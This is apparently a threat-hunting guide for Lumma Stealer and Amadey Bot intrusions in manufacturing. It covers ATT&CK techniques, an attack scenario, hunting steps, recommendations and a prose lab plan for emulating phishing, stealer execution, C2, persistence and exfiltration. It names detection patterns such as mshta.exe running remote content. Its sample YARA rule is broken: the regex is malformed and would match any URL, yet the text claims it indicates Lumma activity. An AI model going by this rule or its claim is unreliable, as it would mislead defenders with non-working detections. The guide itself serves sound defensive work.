Lumma Stealer and Amadey Bot in Manufacturing

A threat actor has gained initial access to the manufacturing network and is utilizing the Lumma Stealer and Amadey Bot malware to steal sensitive data and maintain persistence.

Name:
Lumma Stealer and Amadey Bot in Manufacturing

TTP:
T1071.001 Application Layer Protocol: Web Protocols, T1041 Exfiltration Over C2 Channel, T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, T1552.001 Unsecured Credentials: Credentials In Files

Hypothesis:

A threat actor has gained initial access to the manufacturing network and is utilizing the Lumma Stealer and Amadey Bot malware to steal sensitive data and maintain persistence.

Campaign Type:
Hybrid

Data Sources:

  • Endpoint Security Logs (EDR)
  • Network Traffic Logs (Firewall, IDS/IPS)
  • Windows Event Logs (Security, System, Application)
  • Cloud Storage Logs (if applicable)

Tools:

  • SIEM (e.g., QRadar, Azure Sentinel, ELK)
  • Endpoint Detection and Response (EDR) Tool
  • Network Analysis Tool (e.g., Wireshark)
  • Malware Analysis Sandbox

Scenario:

Initial Access: Phishing email with malicious attachment or link, exploiting a vulnerability in internet-facing systems.

Execution: Lumma Stealer is executed, collecting system information, credentials, and sensitive data.

Command and Control: Amadey Bot establishes communication with a C2 server, enabling remote control and tasking.

Defense Evasion: Lumma Stealer and Amadey Bot employ various techniques to evade detection, such as obfuscation and anti-analysis checks.

Persistence: Amadey Bot establishes persistence mechanisms, ensuring continued access to the compromised system.

Credential Access: Lumma Stealer targets stored credentials and browser data, compromising user accounts.

Lateral Movement: Threat actor leverages stolen credentials to move laterally within the network, accessing critical systems.

Exfiltration: Stolen data is exfiltrated to the attacker’s C2 server or cloud storage.

Impact: Data breach, financial loss, disruption of operations, reputational damage.

Hunting Strategy:

  1. Analyze Endpoint Logs: Search for suspicious processes related to Lumma Stealer and Amadey Bot, unusual file activity, and network connections to known C2 servers.
  2. Inspect Network Traffic: Identify anomalous network traffic patterns, including connections to suspicious domains and data exfiltration attempts.
  3. Correlate Events: Connect events across different data sources to identify a potential attack timeline and the extent of compromise.
  4. Investigate Outliers: Focus on unusual user activity, unexpected data transfers, and deviations from established baselines.
  5. Validate Threats: Analyze suspicious files and network traffic in a sandbox environment to confirm malicious behavior.
  6. Remediation: Isolate compromised systems, remove malware, reset compromised credentials, patch vulnerabilities.
  7. Reporting: Document findings, including IOCs, attack timeline, and remediation actions. Share information with relevant stakeholders.

False Positive Consideration:

  • Legitimate use of remote administration tools or cloud storage services.
  • Benign files or network traffic flagged as suspicious due to heuristics.

Recommendations:

  • Implement strong email security controls, including spam filtering and user awareness training.
  • Regularly update and patch systems to mitigate vulnerabilities.
  • Enforce multi-factor authentication and strong password policies.
  • Monitor network traffic for suspicious activity and block known malicious domains.
  • Deploy EDR solutions for real-time threat detection and response.
  • Regularly back up critical data and systems.
  • Develop an incident response plan to effectively handle security incidents.

Step 1: Prepare the Environment

  • Set up a test environment: This should include a Windows domain controller, a few Windows 10 or 11 endpoints, and a network security monitoring solution (e.g., Zeek, Suricata).
  • Install security monitoring tools: Deploy an EDR agent on each endpoint and configure logging for relevant security events.
  • Centralize logging: Forward logs to a SIEM (e.g., QRadar, Splunk, Elastic Stack) for analysis and correlation.
  • Enable auditing: Configure Windows audit policies to capture events related to process creation, file access, network connections, and registry modifications.

Step 2: Emulate Initial Access

  • Phishing email: Send a phishing email to a user in the test environment. Include a malicious attachment (e.g., a weaponized Office document) or a link to a malicious website hosting the Lumma Stealer payload.
  • Vulnerability exploitation: Exploit a known vulnerability in an internet-facing system within the test environment to deliver the Lumma Stealer payload.

Step 3: Emulate Lumma Stealer Execution

  • Execute Lumma Stealer: Run the Lumma Stealer payload on an endpoint within the test environment.
  • Monitor behavior: Observe Lumma Stealer’s actions, including:
    • Collection of system information
    • Gathering of credentials from browsers and other sources
    • Exfiltration of data to a remote server

Step 4: Emulate Amadey Bot Infection

  • Download Amadey Bot: Simulate the download of Amadey Bot by Lumma Stealer.
  • Execute Amadey Bot: Run Amadey Bot on the infected endpoint.
  • Monitor C2 communication: Observe Amadey Bot establishing communication with a simulated C2 server.

Step 5: Emulate Post-Compromise Activities

  • Persistence: Configure Amadey Bot to establish persistence on the infected endpoint (e.g., create a scheduled task).
  • Credential Access: Use the stolen credentials to access other systems within the test environment.
  • Lateral Movement: Simulate lateral movement by using remote access tools or exploiting vulnerabilities on other systems.
  • Data Exfiltration: Exfiltrate sensitive data from the compromised systems to a designated server within the test environment.

Step 6: Collect and Analyze Logs

  • Gather logs: Collect security event logs from the endpoints, network security monitoring solution, and SIEM.
  • Analyze logs: Use the SIEM or other analysis tools to search for events related to the emulated attack techniques.
  • Filter events: Focus on events related to:
    • Suspicious process execution (e.g., “ssh.exe” with unusual parameters, “mshta.exe” executing remote content)
    • Network connections to suspicious domains
    • File modifications in sensitive directories
    • Registry key changes related to persistence

Step 7: Refine Detections

  • Identify patterns: Analyze the collected logs to identify patterns and refine your detection rules.
  • Develop detection rules: Use YARA, SIGMA, or other threat detection frameworks to create robust detection rules based on the observed indicators of compromise.
  • Document findings: Document your analysis, findings, and detection rules to improve future threat hunting efforts.

Example YARA Rule:

Code snippet
rule lumma_stealer_config
{
  strings:
    $re_c2 = /https?://[^s/]+/ 

  condition:
    $re_c2
}
 

This YARA rule searches for strings that match common patterns for C2 server URLs, which can be indicative of Lumma Stealer activity.

By following these steps, you can emulate a threat hunt for Lumma Stealer and Amadey Bot, refine your detection capabilities, and improve your organization’s security posture against these threats.

D3 Diagram:

Leave a Reply